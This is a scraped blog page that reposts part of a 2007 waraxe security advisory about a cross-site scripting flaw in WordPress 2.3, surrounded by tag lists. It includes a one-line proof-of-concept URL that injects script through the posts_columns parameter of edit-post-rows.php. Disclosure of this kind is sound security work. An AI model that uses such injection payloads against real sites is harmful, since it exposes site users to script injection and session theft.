Browse by Tag

ajax blog blog archive categories code css database database security development exploit flat google guitar hosting html injection internet javascript Links linux menu mysql MySQL Security mysql shell new news oracle password php php mysql security programming really simple syndication registerwidget search security select seo server software sql sql injection technology update utf vulnerability web widgetinfo widgetmanager wordpress xml

[waraxe-2007-SA#059] - XSS in WordPress 2.3

“register_globals” must be “on” for this exploit to be successful. Proof of concept:. http://victim.com/wp-admin/edit-post-rows.php?posts_columns[]=alert(123);. //—–> See ya soon and have a nice day

See the rest here:
[waraxe-2007-SA#059] - XSS in WordPress 2.3

adl asap atom bugtraq security focus edit me edit post email post permanent link rsd utf xssadl, asap, atom, bugtraq security focus, edit me, edit post, email post, permanent link, rsd, utf, xss